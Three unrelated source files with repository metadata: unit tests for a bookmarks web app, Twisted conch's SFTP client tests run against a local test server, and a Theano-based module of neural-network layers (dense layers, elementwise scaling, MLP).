            self.assertEqual(resp.code, 200)
            self.assertIn('''bookmark_bar''', resp.body)
            import json
            data = json.loads(resp.body)
            self.assertTrue(data)
            self.assertTrue(isinstance(data, dict))
    def test_bookmarks_list(self):
        with nop_auth():
            resp = self.fetch('/bookmarks/chrome/list')
            self.assertEqual(resp.code, 200)
            self.assertIn('''typeof="#BookmarksList"''', resp.body)
    def test_bookmarks_links_json(self):
        # links.json returns a JSON list of bookmark URLs.
        with nop_auth():
            resp = self.fetch('/bookmarks/chrome/links.json')
            self.assertEqual(resp.code, 200)
            self.assertIn('''data:text/html, <html style''', resp.body)
            import json
            data = json.loads(resp.body)
            self.assertTrue(data)
            self.assertTrue(isinstance(data, list))
    def test_bookmarks_tree(self):
        with nop_auth():
            resp = self.fetch('/bookmarks/chrome/tree')
            self.assertEqual(resp.code, 200)
            self.assertIn('''typeof="pb:BookmarksTree"''', resp.body)
    def test_bookmarks_tree_rdfa(self):
        # The tree page embeds RDFa; parse it and round-trip through several
        # serializations to confirm the markup is machine-readable.
        with nop_auth():
            resp = self.fetch('/bookmarks/chrome/tree')
            self.assertEqual(resp.code, 200)
            self.assertIn('''typeof="pb:BookmarksTree"''', resp.body)
            import rdflib
            import rdflib.tools.rdfpipe
            import StringIO
            input_format = 'rdfa'
            graph = rdflib.ConjunctiveGraph()
            graph.parse(StringIO.StringIO(resp.body), format=input_format)
            self.assertTrue(graph)
            for output_format in ['xml', 'n3']: # json-ld
                output = graph.serialize(format=output_format)
                self.assertTrue(output)
            # json-ld serialization is exercised only when the optional
            # rdflib_jsonld plugin is installed.
            try:
                import rdflib_jsonld
                rdflib_jsonld
                output_format = 'json-ld'
                output = graph.serialize(format=output_format, auto_compact=True)
                self.assertTrue(output)
            except ImportError:
                pass
                # TODO: skipif
| {
"content_hash": "e940a028c7e7878640b3c0d13e375a98",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 81,
"avg_line_length": 32.75609756097561,
"alnum_prop": 0.5775626706378754,
"repo_name": "westurner/pbm",
"id": "4db30ca4b128eba1a67e7eaa0bd54edb8a29bd4c",
"size": "4075",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_app.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "18970"
},
{
"name": "Makefile",
"bytes": "2757"
},
{
"name": "Python",
"bytes": "93048"
}
],
"symlink_target": ""
} |
import sys, os
try:
import Crypto.Cipher.DES3
except ImportError:
Crypto = None
try:
from twisted.conch import unix
from twisted.conch.scripts import cftp
from twisted.conch.client import connect, default, options
from twisted.conch.test.test_filetransfer import FileTransferForTestAvatar
except ImportError:
unix = None
try:
del sys.modules['twisted.conch.unix'] # remove the bad import
except KeyError:
# In Python 2.4, the bad import has already been cleaned up for us.
pass
from twisted.cred import portal
from twisted.internet import reactor, protocol, interfaces, defer, error
from twisted.internet.utils import getProcessOutputAndValue
from twisted.python import log
from twisted.conch.test import test_ssh, test_conch
from twisted.conch.test.test_filetransfer import SFTPTestBase
from twisted.conch.test.test_filetransfer import FileTransferTestAvatar
class FileTransferTestRealm:
    """Trivial cred realm handing out file-transfer test avatars.

    Every avatar request is answered with a fresh FileTransferTestAvatar
    rooted at the configured test directory; the logout callable is a no-op.
    """
    def __init__(self, testDir):
        self.testDir = testDir
    def requestAvatar(self, avatarID, mind, *ifaces):
        avatar = FileTransferTestAvatar(self.testDir)
        return ifaces[0], avatar, lambda: None
class SFTPTestProcess(protocol.ProcessProtocol):
    """
    Protocol for testing cftp. Provides an interface between Python (where all
    the tests are) and the cftp client process (which does the work that is
    being tested).
    """
    def __init__(self, onOutReceived):
        """
        @param onOutReceived: A L{Deferred} to be fired as soon as data is
        received from stdout.
        """
        self.clearBuffer()
        self.onOutReceived = onOutReceived
        # Fired (if set) when the child process ends; see killProcess().
        self.onProcessEnd = None
        # Deferred for the command currently awaiting a 'cftp> ' prompt.
        self._expectingCommand = None
        self._processEnded = False
    def clearBuffer(self):
        """
        Clear any buffered data received from stdout. Should be private.
        """
        self.buffer = ''
        self._linesReceived = []
        self._lineBuffer = ''
    def outReceived(self, data):
        """
        Called by Twisted when the cftp client prints data to stdout.
        """
        log.msg('got %s' % data)
        # Split into complete lines; the trailing partial line (possibly a
        # prompt) stays in _lineBuffer until more data arrives.
        lines = (self._lineBuffer + data).split('\n')
        self._lineBuffer = lines.pop(-1)
        self._linesReceived.extend(lines)
        # XXX - not strictly correct.
        # We really want onOutReceived to fire after the first 'cftp>' prompt
        # has been received. (See use in TestOurServerCmdLineClient.setUp)
        if self.onOutReceived is not None:
            d, self.onOutReceived = self.onOutReceived, None
            d.callback(data)
        self.buffer += data
        self._checkForCommand()
    def _checkForCommand(self):
        # A fresh 'cftp> ' prompt in the partial-line buffer means the
        # previous command finished; deliver its accumulated output.
        prompt = 'cftp> '
        if self._expectingCommand and self._lineBuffer == prompt:
            buf = '\n'.join(self._linesReceived)
            # Strip the echoed prompt that precedes the command's output.
            if buf.startswith(prompt):
                buf = buf[len(prompt):]
            self.clearBuffer()
            d, self._expectingCommand = self._expectingCommand, None
            d.callback(buf)
    def errReceived(self, data):
        """
        Called by Twisted when the cftp client prints data to stderr.
        """
        log.msg('err: %s' % data)
    def getBuffer(self):
        """
        Return the contents of the buffer of data received from stdout.
        """
        return self.buffer
    def runCommand(self, command):
        """
        Issue the given command via the cftp client. Return a C{Deferred} that
        fires when the server returns a result. Note that the C{Deferred} will
        callback even if the server returns some kind of error.
        @param command: A string containing an sftp command.
        @return: A C{Deferred} that fires when the sftp server returns a
        result. The payload is the server's response string.
        """
        self._expectingCommand = defer.Deferred()
        self.clearBuffer()
        self.transport.write(command + '\n')
        return self._expectingCommand
    def runScript(self, commands):
        """
        Run each command in sequence and return a Deferred that fires when all
        commands are completed.
        @param commands: A list of strings containing sftp commands.
        @return: A C{Deferred} that fires when all commands are completed. The
        payload is a list of response strings from the server, in the same
        order as the commands.
        """
        # The semaphore serializes the commands; gatherResults preserves order.
        sem = defer.DeferredSemaphore(1)
        dl = [sem.run(self.runCommand, command) for command in commands]
        return defer.gatherResults(dl)
    def killProcess(self):
        """
        Kill the process if it is still running.
        If the process is still running, sends a KILL signal to the transport
        and returns a C{Deferred} which fires when L{processEnded} is called.
        @return: a C{Deferred}.
        """
        if self._processEnded:
            return defer.succeed(None)
        self.onProcessEnd = defer.Deferred()
        self.transport.signalProcess('KILL')
        return self.onProcessEnd
    def processEnded(self, reason):
        """
        Called by Twisted when the cftp client process ends.
        """
        self._processEnded = True
        if self.onProcessEnd:
            d, self.onProcessEnd = self.onProcessEnd, None
            d.callback(None)
class CFTPClientTestBase(SFTPTestBase):
    """
    Base class for cftp client tests.

    setUp writes a DSA key pair and a known-hosts file into the working
    directory (removed again in tearDown) and provides helpers to start and
    stop an in-process conch file-transfer server.
    """
    def setUp(self):
        # Use context managers so the handles are closed even if a write
        # fails part-way through.
        with open('dsa_test.pub', 'w') as f:
            f.write(test_ssh.publicDSA_openssh)
        with open('dsa_test', 'w') as f:
            f.write(test_ssh.privateDSA_openssh)
        # 33152 == 0o100600: regular file, owner read/write only, as ssh
        # requires for private key files.
        os.chmod('dsa_test', 33152)
        with open('kh_test', 'w') as f:
            f.write('127.0.0.1 ' + test_ssh.publicRSA_openssh)
        return SFTPTestBase.setUp(self)
    def startServer(self):
        """Start an in-process SSH file-transfer server on a random port."""
        realm = FileTransferTestRealm(self.testDir)
        p = portal.Portal(realm)
        p.registerChecker(test_ssh.ConchTestPublicKeyChecker())
        fac = test_ssh.ConchTestServerFactory()
        fac.portal = p
        self.server = reactor.listenTCP(0, fac, interface="127.0.0.1")
    def stopServer(self):
        """Stop the server, dropping any live connection first."""
        if not hasattr(self.server.factory, 'proto'):
            return self._cbStopServer(None)
        self.server.factory.proto.expectedLoseConnection = 1
        d = defer.maybeDeferred(
            self.server.factory.proto.transport.loseConnection)
        d.addCallback(self._cbStopServer)
        return d
    def _cbStopServer(self, ignored):
        return defer.maybeDeferred(self.server.stopListening)
    def tearDown(self):
        for f in ['dsa_test.pub', 'dsa_test', 'kh_test']:
            try:
                os.remove(f)
            except OSError:
                # The file may never have been created if setUp failed;
                # narrowed from a bare except that hid real bugs.
                pass
        return SFTPTestBase.tearDown(self)
class TestOurServerCmdLineClient(CFTPClientTestBase):
    """
    Functional tests driving the cftp command-line client, spawned as a
    child process, against the in-process conch file-transfer server.
    """
    def setUp(self):
        # Start the server, then spawn the cftp client as a subprocess
        # pointed at it; the returned Deferred fires once the first
        # 'cftp> ' prompt has been received by SFTPTestProcess.
        CFTPClientTestBase.setUp(self)
        self.startServer()
        cmds = ('-p %i -l testuser '
                '--known-hosts kh_test '
                '--user-authentications publickey '
                '--host-key-algorithms ssh-rsa '
                '-K direct '
                '-i dsa_test '
                '-a --nocache '
                '-v '
                '127.0.0.1')
        port = self.server.getHost().port
        cmds = test_conch._makeArgs((cmds % port).split(), mod='cftp')
        log.msg('running %s %s' % (sys.executable, cmds))
        d = defer.Deferred()
        self.processProtocol = SFTPTestProcess(d)
        d.addCallback(lambda _: self.processProtocol.clearBuffer())
        env = os.environ.copy()
        # Let the child import the same Twisted as the parent.
        env['PYTHONPATH'] = os.pathsep.join(sys.path)
        reactor.spawnProcess(self.processProtocol, sys.executable, cmds,
                             env=env)
        return d
    def tearDown(self):
        # Stop the server first, then make sure the client process is gone.
        d = self.stopServer()
        d.addCallback(lambda _: self.processProtocol.killProcess())
        return d
    def _killProcess(self, ignored):
        # Best-effort kill; the process may already have exited.
        try:
            self.processProtocol.transport.signalProcess('KILL')
        except error.ProcessExitedAlready:
            pass
    def runCommand(self, command):
        """
        Run the given command with the cftp client. Return a C{Deferred} that
        fires when the command is complete. Payload is the server's output for
        that command.
        """
        return self.processProtocol.runCommand(command)
    def runScript(self, *commands):
        """
        Run the given commands with the cftp client. Returns a C{Deferred}
        that fires when the commands are all complete. The C{Deferred}'s
        payload is a list of output for each command.
        """
        return self.processProtocol.runScript(commands)
    def testCdPwd(self):
        """
        Test that 'pwd' reports the current remote directory, that 'lpwd'
        reports the current local directory, and that changing to a
        subdirectory then changing to its parent leaves you in the original
        remote directory.
        """
        # XXX - not actually a unit test, see docstring.
        homeDir = os.path.join(os.getcwd(), self.testDir)
        d = self.runScript('pwd', 'lpwd', 'cd testDirectory', 'cd ..', 'pwd')
        # Drop the response to 'cd ..' (index 3); only the other four
        # responses are asserted on.
        d.addCallback(lambda xs: xs[:3] + xs[4:])
        d.addCallback(self.assertEqual,
                      [homeDir, os.getcwd(), '', homeDir])
        return d
    def testChAttrs(self):
        """
        Check that 'ls -l' output includes the access permissions and that
        this output changes appropriately with 'chmod'.
        """
        def _check(results):
            self.flushLoggedErrors()
            self.assertTrue(results[0].startswith('-rw-r--r--'))
            self.assertEqual(results[1], '')
            self.assertTrue(results[2].startswith('----------'), results[2])
            self.assertEqual(results[3], '')
        d = self.runScript('ls -l testfile1', 'chmod 0 testfile1',
                           'ls -l testfile1', 'chmod 644 testfile1')
        return d.addCallback(_check)
    # XXX test chgrp/own
    def testList(self):
        """
        Check 'ls' works as expected. Checks for wildcards, hidden files,
        listing directories and listing empty directories.
        """
        def _check(results):
            self.assertEqual(results[0], ['testDirectory', 'testRemoveFile',
                                          'testRenameFile', 'testfile1'])
            self.assertEqual(results[1], ['testDirectory', 'testRemoveFile',
                                          'testRenameFile', 'testfile1'])
            self.assertEqual(results[2], ['testRemoveFile', 'testRenameFile'])
            self.assertEqual(results[3], ['.testHiddenFile', 'testRemoveFile',
                                          'testRenameFile'])
            self.assertEqual(results[4], [''])
        d = self.runScript('ls', 'ls ../' + os.path.basename(self.testDir),
                           'ls *File', 'ls -a *File', 'ls -l testDirectory')
        d.addCallback(lambda xs: [x.split('\n') for x in xs])
        return d.addCallback(_check)
    def testHelp(self):
        """
        Check that running the '?' command returns help.
        """
        d = self.runCommand('?')
        d.addCallback(self.assertEqual,
                      cftp.StdioClient(None).cmd_HELP('').strip())
        return d
    def assertFilesEqual(self, name1, name2, msg=None):
        """
        Assert that the files at C{name1} and C{name2} contain exactly the
        same data.
        """
        # NOTE(review): uses the Python 2 file() builtin; the handles are
        # closed by garbage collection rather than explicitly.
        f1 = file(name1).read()
        f2 = file(name2).read()
        self.failUnlessEqual(f1, f2, msg)
    def testGet(self):
        """
        Test that 'get' saves the remote file to the correct local location,
        that the output of 'get' is correct and that 'rm' actually removes
        the file.
        """
        # XXX - not actually a unit test
        expectedOutput = ("Transferred %s/%s/testfile1 to %s/test file2"
                          % (os.getcwd(), self.testDir, self.testDir))
        def _checkGet(result):
            self.assertTrue(result.endswith(expectedOutput))
            self.assertFilesEqual(self.testDir + '/testfile1',
                                  self.testDir + '/test file2',
                                  "get failed")
            return self.runCommand('rm "test file2"')
        d = self.runCommand('get testfile1 "%s/test file2"' % (self.testDir,))
        d.addCallback(_checkGet)
        d.addCallback(lambda _: self.failIf(
            os.path.exists(self.testDir + '/test file2')))
        return d
    def testWildcardGet(self):
        """
        Test that 'get' works correctly when given wildcard parameters.
        """
        def _check(ignored):
            self.assertFilesEqual(self.testDir + '/testRemoveFile',
                                  'testRemoveFile',
                                  'testRemoveFile get failed')
            self.assertFilesEqual(self.testDir + '/testRenameFile',
                                  'testRenameFile',
                                  'testRenameFile get failed')
        d = self.runCommand('get testR*')
        return d.addCallback(_check)
    def testPut(self):
        """
        Check that 'put' uploads files correctly and that they can be
        successfully removed. Also check the output of the put command.
        """
        # XXX - not actually a unit test
        expectedOutput = ('Transferred %s/testfile1 to %s/%s/test"file2'
                          % (self.testDir, os.getcwd(), self.testDir))
        def _checkPut(result):
            self.assertFilesEqual(self.testDir + '/testfile1',
                                  self.testDir + '/test"file2')
            self.failUnless(result.endswith(expectedOutput))
            return self.runCommand('rm "test\\"file2"')
        d = self.runCommand('put %s/testfile1 "test\\"file2"'
                            % (self.testDir,))
        d.addCallback(_checkPut)
        d.addCallback(lambda _: self.failIf(
            os.path.exists(self.testDir + '/test"file2')))
        return d
    def testWildcardPut(self):
        """
        What happens if you issue a 'put' command and include a wildcard (i.e.
        '*') in parameter? Check that all files matching the wildcard are
        uploaded to the correct directory.
        """
        def check(results):
            self.assertEqual(results[0], '')
            self.assertEqual(results[2], '')
            self.assertFilesEqual(self.testDir + '/testRemoveFile',
                                  self.testDir + '/../testRemoveFile',
                                  'testRemoveFile get failed')
            self.assertFilesEqual(self.testDir + '/testRenameFile',
                                  self.testDir + '/../testRenameFile',
                                  'testRenameFile get failed')
        d = self.runScript('cd ..',
                           'put %s/testR*' % (self.testDir,),
                           'cd %s' % os.path.basename(self.testDir))
        d.addCallback(check)
        return d
    def testLink(self):
        """
        Test that 'ln' creates a file which appears as a link in the output of
        'ls'. Check that removing the new file succeeds without output.
        """
        def _check(results):
            self.flushLoggedErrors()
            self.assertEqual(results[0], '')
            self.assertTrue(results[1].startswith('l'), 'link failed')
            return self.runCommand('rm testLink')
        d = self.runScript('ln testLink testfile1', 'ls -l testLink')
        d.addCallback(_check)
        d.addCallback(self.assertEqual, '')
        return d
    def testRemoteDirectory(self):
        """
        Test that we can create and remove directories with the cftp client.
        """
        def _check(results):
            self.assertEqual(results[0], '')
            self.assertTrue(results[1].startswith('d'))
            return self.runCommand('rmdir testMakeDirectory')
        d = self.runScript('mkdir testMakeDirectory',
                           'ls -l testMakeDirector?')
        d.addCallback(_check)
        d.addCallback(self.assertEqual, '')
        return d
    def test_existingRemoteDirectory(self):
        """
        Test that a C{mkdir} on an existing directory fails with the
        appropriate error, and doesn't log an useless error server side.
        """
        def _check(results):
            self.assertEquals(results[0], '')
            self.assertEquals(results[1],
                              'remote error 11: mkdir failed')
        d = self.runScript('mkdir testMakeDirectory',
                           'mkdir testMakeDirectory')
        d.addCallback(_check)
        return d
    def testLocalDirectory(self):
        """
        Test that we can create a directory locally and remove it with the
        cftp client. This test works because the 'remote' server is running
        out of a local directory.
        """
        d = self.runCommand('lmkdir %s/testLocalDirectory' % (self.testDir,))
        d.addCallback(self.assertEqual, '')
        d.addCallback(lambda _: self.runCommand('rmdir testLocalDirectory'))
        d.addCallback(self.assertEqual, '')
        return d
    def testRename(self):
        """
        Test that we can rename a file.
        """
        def _check(results):
            self.assertEqual(results[0], '')
            self.assertEqual(results[1], 'testfile2')
            return self.runCommand('rename testfile2 testfile1')
        d = self.runScript('rename testfile1 testfile2', 'ls testfile?')
        d.addCallback(_check)
        d.addCallback(self.assertEqual, '')
        return d
    def testCommand(self):
        """
        Run a local shell command via the '!' prefix and check its output.
        """
        d = self.runCommand('!echo hello')
        return d.addCallback(self.assertEqual, 'hello')
class TestOurServerBatchFile(CFTPClientTestBase):
    """
    Tests for cftp's batch-file mode ('cftp -b batchfile'), run against the
    in-process conch server.
    """
    def setUp(self):
        CFTPClientTestBase.setUp(self)
        self.startServer()
    def tearDown(self):
        CFTPClientTestBase.tearDown(self)
        return self.stopServer()
    def _getBatchOutput(self, f):
        # Write the batch commands to a temp file, run 'cftp -b' on it in a
        # child process, and return a Deferred firing with the child's
        # stdout; the temp file is removed afterwards.
        fn = self.mktemp()
        open(fn, 'w').write(f)
        l = []
        port = self.server.getHost().port
        cmds = ('-p %i -l testuser '
                '--known-hosts kh_test '
                '--user-authentications publickey '
                '--host-key-algorithms ssh-rsa '
                '-K direct '
                '-i dsa_test '
                '-a --nocache '
                '-v -b %s 127.0.0.1') % (port, fn)
        cmds = test_conch._makeArgs(cmds.split(), mod='cftp')[1:]
        log.msg('running %s %s' % (sys.executable, cmds))
        env = os.environ.copy()
        env['PYTHONPATH'] = os.pathsep.join(sys.path)
        self.server.factory.expectedLoseConnection = 1
        d = getProcessOutputAndValue(sys.executable, cmds, env=env)
        def _cleanup(res):
            os.remove(fn)
            return res
        # getProcessOutputAndValue fires with (out, err, code); keep stdout.
        d.addCallback(lambda res: res[0])
        d.addBoth(_cleanup)
        return d
    def testBatchFile(self):
        """Test whether batch file function of cftp ('cftp -b batchfile').
        This works by treating the file as a list of commands to be run.
        """
        cmds = """pwd
ls
exit
"""
        def _cbCheckResult(res):
            res = res.split('\n')
            log.msg('RES %s' % str(res))
            self.failUnless(res[1].find(self.testDir) != -1, repr(res))
            self.failUnlessEqual(res[3:-2], ['testDirectory', 'testRemoveFile',
                                             'testRenameFile', 'testfile1'])
        d = self._getBatchOutput(cmds)
        d.addCallback(_cbCheckResult)
        return d
    def testError(self):
        """Test that an error in the batch file stops running the batch.
        """
        cmds = """chown 0 missingFile
pwd
exit
"""
        def _cbCheckResult(res):
            # 'pwd' must not have run after the failing chown.
            self.failIf(res.find(self.testDir) != -1)
        d = self._getBatchOutput(cmds)
        d.addCallback(_cbCheckResult)
        return d
    def testIgnoredError(self):
        """Test that a minus sign '-' at the front of a line ignores
        any errors.
        """
        cmds = """-chown 0 missingFile
pwd
exit
"""
        def _cbCheckResult(res):
            # 'pwd' must have run despite the failing chown.
            self.failIf(res.find(self.testDir) == -1)
        d = self._getBatchOutput(cmds)
        d.addCallback(_cbCheckResult)
        return d
class TestOurServerUnixClient(test_conch._UnixFixHome, CFTPClientTestBase):
    """
    Tests running cftp through a cached connection over the conch unix
    socket ('-K unix'); setUp establishes the connection to be reused.
    """
    def setUp(self):
        test_conch._UnixFixHome.setUp(self)
        CFTPClientTestBase.setUp(self)
        self.startServer()
        cmd1 = ('-p %i -l testuser '
                '--known-hosts kh_test '
                '--host-key-algorithms ssh-rsa '
                '-a '
                '-K direct '
                '-i dsa_test '
                '127.0.0.1'
                )
        port = self.server.getHost().port
        cmds1 = (cmd1 % port).split()
        o = options.ConchOptions()
        # Replace parseArgs so the trailing host argument is stored rather
        # than interpreted as a command to run remotely.
        def _(host, *args):
            o['host'] = host
        o.parseArgs = _
        o.parseOptions(cmds1)
        vhk = default.verifyHostKey
        self.conn = conn = test_conch.SSHTestConnectionForUnix(None)
        uao = default.SSHUserAuthClient(o['user'], o, conn)
        return connect.connect(o['host'], int(o['port']), o, vhk, uao)
    def tearDown(self):
        # Tear down the cached connection, the server and the HOME fixture.
        CFTPClientTestBase.tearDown(self)
        d = defer.maybeDeferred(self.conn.transport.loseConnection)
        d.addCallback(lambda x : self.stopServer())
        def clean(ign):
            test_conch._UnixFixHome.tearDown(self)
            return ign
        return defer.gatherResults([d, self.conn.stopDeferred]).addBoth(clean)
    def _getBatchOutput(self, f):
        # Like TestOurServerBatchFile._getBatchOutput, but uses '-K unix' so
        # the client goes through the cached unix-socket connection.
        fn = self.mktemp()
        open(fn, 'w').write(f)
        port = self.server.getHost().port
        cmds = ('-p %i -l testuser '
                '-K unix '
                '-a '
                '-v -b %s 127.0.0.1') % (port, fn)
        cmds = test_conch._makeArgs(cmds.split(), mod='cftp')[1:]
        log.msg('running %s %s' % (sys.executable, cmds))
        env = os.environ.copy()
        env['PYTHONPATH'] = os.pathsep.join(sys.path)
        self.server.factory.expectedLoseConnection = 1
        d = getProcessOutputAndValue(sys.executable, cmds, env=env)
        def _cleanup(res):
            os.remove(fn)
            return res
        d.addCallback(lambda res: res[0])
        d.addBoth(_cleanup)
        return d
    def testBatchFile(self):
        """Test that the client works even over a UNIX connection.
        """
        cmds = """pwd
exit
"""
        d = self._getBatchOutput(cmds)
        d.addCallback(
            lambda res : self.failIf(res.find(self.testDir) == -1,
                                     "%s not in %r" % (self.testDir, res)))
        return d
class TestOurServerSftpClient(CFTPClientTestBase):
    """
    Test the sftp server against sftp command line client.
    """
    def setUp(self):
        CFTPClientTestBase.setUp(self)
        return self.startServer()
    def tearDown(self):
        return self.stopServer()
    def test_extendedAttributes(self):
        """
        Test the return of extended attributes by the server: the sftp client
        should ignore them, but still be able to parse the response correctly.
        This test is mainly here to check that
        L{filetransfer.FILEXFER_ATTR_EXTENDED} has the correct value.
        """
        fn = self.mktemp()
        open(fn, 'w').write("ls .\nexit")
        port = self.server.getHost().port
        # Patch the server avatar so every stat result carries an extended
        # attribute; the external client must tolerate it.
        oldGetAttr = FileTransferForTestAvatar._getAttrs
        def _getAttrs(self, s):
            attrs = oldGetAttr(self, s)
            attrs["ext_foo"] = "bar"
            return attrs
        self.patch(FileTransferForTestAvatar, "_getAttrs", _getAttrs)
        self.server.factory.expectedLoseConnection = True
        cmds = ('-o', 'IdentityFile=dsa_test',
                '-o', 'UserKnownHostsFile=kh_test',
                '-o', 'HostKeyAlgorithms=ssh-rsa',
                '-o', 'Port=%i' % (port,), '-b', fn, 'testuser@127.0.0.1')
        d = getProcessOutputAndValue("sftp", cmds)
        def check(result):
            # result is (stdout, stderr, exit code); expect success and a
            # normal directory listing on stdout.
            self.assertEquals(result[2], 0)
            for i in ['testDirectory', 'testRemoveFile',
                      'testRenameFile', 'testfile1']:
                self.assertIn(i, result[0])
        return d.addCallback(check)
# Skip these suites when the platform lacks process support (spawnProcess)
# or PyCrypto; the sftp interop suite additionally needs an OpenSSH
# command-line client on PATH.
if not unix or not Crypto or not interfaces.IReactorProcess(reactor, None):
    TestOurServerCmdLineClient.skip = "don't run w/o spawnprocess or PyCrypto"
    TestOurServerBatchFile.skip = "don't run w/o spawnProcess or PyCrypto"
    TestOurServerUnixClient.skip = "don't run w/o spawnProcess or PyCrypto"
    TestOurServerSftpClient.skip = "don't run w/o spawnProcess or PyCrypto"
else:
    from twisted.python.procutils import which
    if not which('sftp'):
        TestOurServerSftpClient.skip = "no sftp command-line client available"
| {
"content_hash": "e4e3653d11e958b7f4d82b928144fa59",
"timestamp": "",
"source": "github",
"line_count": 717,
"max_line_length": 79,
"avg_line_length": 34.84239888423989,
"alnum_prop": 0.5758546153230326,
"repo_name": "hortonworks/hortonworks-sandbox",
"id": "5df9dd9f69fe0f744757b1095bbdba0f8a4ab3f5",
"size": "25125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/Twisted/twisted/conch/test/test_cftp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "27264"
},
{
"name": "Assembly",
"bytes": "207947"
},
{
"name": "C",
"bytes": "10279874"
},
{
"name": "C++",
"bytes": "208068"
},
{
"name": "CSS",
"bytes": "356769"
},
{
"name": "Emacs Lisp",
"bytes": "3171"
},
{
"name": "Java",
"bytes": "3064179"
},
{
"name": "JavaScript",
"bytes": "1532806"
},
{
"name": "PHP",
"bytes": "4160"
},
{
"name": "Perl",
"bytes": "139518"
},
{
"name": "Python",
"bytes": "27735073"
},
{
"name": "R",
"bytes": "12290"
},
{
"name": "Ruby",
"bytes": "5050"
},
{
"name": "Shell",
"bytes": "42062"
},
{
"name": "XSLT",
"bytes": "585"
}
],
"symlink_target": ""
} |
from control4.maths.symbolic import apply_nonlinearity
from control4.maths.numeric import normc
from control4.config import floatX
import theano,theano.tensor as TT
import numpy as np
from control4.misc.collection_utils import concatenate
class ParameterizedFunc(object):
    """
    Base class for functions whose parameters are theano shared variables.

    Subclasses implement ``__call__`` (the computation) and ``opt_vars``
    (the variables to be optimized); ``extra_vars`` lists auxiliary,
    non-optimized variables and defaults to none.
    """
    def __call__(self, *inputs):
        # Subclasses must provide the forward computation.
        raise NotImplementedError
    def opt_vars(self):
        # Subclasses must list the shared variables to be optimized.
        raise NotImplementedError
    def extra_vars(self):
        # By default a parameterized function has no auxiliary variables.
        return []
class DenseLayer(ParameterizedFunc):
    """
    Affine transformation + nonlinearity
    """
    def __init__(self, src_sizes, targ_size, nonlinearity, src_names=None, targ_name=None, col_norm=1.0):
        """
        src_sizes: dimensionality of inputs
        targ_size: dimensionality of output
        nonlinearity: str, see apply_nonlinearity
        src_names: optional, list of str names of inputs to this layer
        targ_name: optional, str name of output of this layer
        col_norm: desired column norm of each initial weight matrix
        """
        if src_names is None: src_names = ["unnamedinput%i"%i for i in xrange(len(src_sizes))]
        if targ_name is None: targ_name = "unnamedoutput"
        n_in = len(src_sizes)
        # One weight matrix per input; the 1/sqrt(n_in) factor keeps the
        # norm of the summed pre-activation roughly constant as the number
        # of inputs grows.
        Ws_init = [normc(randn_init(src_size,targ_size))*(col_norm/np.sqrt(n_in)) for src_size in src_sizes]
        b_init = np.zeros((1,targ_size),floatX)
        self.Ws = [theano.shared(W,name="W_%s_%s"%(src_name,targ_name)) for (W,src_name) in zip(Ws_init,src_names)]
        self.b = theano.shared(b_init,name="b_%s"%targ_name)
        # Let the (1, targ_size) bias broadcast across the batch dimension.
        self.b.type.broadcastable = (True,False)
        self.nonlinearity = nonlinearity
    def __call__(self,*inputs):
        # Computes nonlinearity(sum_i inputs[i].dot(Ws[i]) + b).
        assert len(inputs)==len(self.Ws)
        summands = []
        summands.extend([X.dot(W) for (W,X) in zip(self.Ws,inputs)])
        summands.append(self.b)
        return apply_nonlinearity(TT.add(*summands),self.nonlinearity)
    def opt_vars(self):
        # All weights and the bias are optimized.
        return self.Ws + [self.b]
    def extra_vars(self):
        return []
class ElemwiseLinearLayer(ParameterizedFunc):
    """
    Elementwise affine map: X -> (X + trans) * scaling.
    trans and scaling are not optimized (they are extra_vars); presumably
    they are set externally, e.g. for input standardization — see update().
    """
    def __init__(self, size,name_prefix=""):
        self.trans = theano.shared(np.zeros((1,size),floatX),name=name_prefix+'trans')
        self.scaling = theano.shared(np.ones((1,size),floatX),name=name_prefix+'scaling')
        # Let the (1, size) parameters broadcast across the batch dimension.
        self.trans.type.broadcastable = (True,False)
        self.scaling.type.broadcastable = (True,False)
    def __call__(self,X):
        if X.dtype != floatX: X = TT.cast(X,floatX)
        return (X+self.trans)*self.scaling
    def opt_vars(self):
        # Nothing here is optimized by training.
        return []
    def extra_vars(self):
        return [self.trans,self.scaling]
    def update(self, newtrans, newscaling):
        # Overwrite the affine parameters in place (reshaped to row vectors).
        self.trans.set_value(newtrans.reshape(1,-1))
        self.scaling.set_value(newscaling.reshape(1,-1))
    def update_with_compensation(self,newtrans,newscaling, nextW, nextb):
        """
        Change trans/scaling while adjusting the following layer's weight
        (nextW) and bias (nextb) shared variables so the composition of this
        layer with the next affine map is unchanged.
        """
        newtrans = newtrans.reshape(1,-1)
        newscaling = newscaling.reshape(1,-1)
        trans_old = self.trans.get_value()
        scaling_old = self.scaling.get_value()
        self.trans.set_value(newtrans)
        self.scaling.set_value(newscaling)
        nextW_old = nextW.get_value(borrow=True)
        # Rescale each row of the next weight matrix by old/new scaling...
        nextW_new = (scaling_old/newscaling).T * nextW_old
        nextW.set_value(nextW_new)
        nextb_old = nextb.get_value(borrow=True)
        # ...and shift the next bias to cancel the change in translation.
        nextb_new = nextb_old + (trans_old * scaling_old).dot(nextW_old) - (newtrans * newscaling).dot(nextW_new)
        nextb.set_value(nextb_new.reshape(1,-1))
class MLP(ParameterizedFunc):
    """
    A sequence of DenseLayer
    """
    def __init__(self, sizes, nonlinearities, names=None, init_col_norms=None):
        """
        sizes: number of units at each layer
        i.e., we have (sizes-1) weight matrices and nonlinearities
        nonlinearities: one nonlinearity name per weight matrix
        names: optional layer names, one per entry of sizes
        init_col_norms: optional initial column norm per weight matrix
        """
        assert len(nonlinearities) == len(sizes)-1
        if names is None: names = [str(i) for i in xrange(len(sizes))]
        else: assert len(names) == len(sizes)
        if init_col_norms is None: init_col_norms = [1.0 for _ in xrange(len(nonlinearities))]
        else: assert len(init_col_norms) == len(nonlinearities)
        self.layers = []
        # Chain single-input DenseLayers, wiring each layer's output size
        # and name into the next layer's input.
        prev_output_size = sizes[0]
        prev_name = names[0]
        for (output_size,nonlinearity,name,col_norm) in zip(sizes[1:],nonlinearities,names[1:],init_col_norms):
            layer = DenseLayer([prev_output_size],output_size,nonlinearity=nonlinearity,src_names=[prev_name],targ_name=name,col_norm=col_norm)
            self.layers.append(layer)
            prev_output_size=output_size
            prev_name = name
    def __call__(self,X):
        # Feed X through the layers in order.
        for layer in self.layers:
            X = layer(X)
        return X
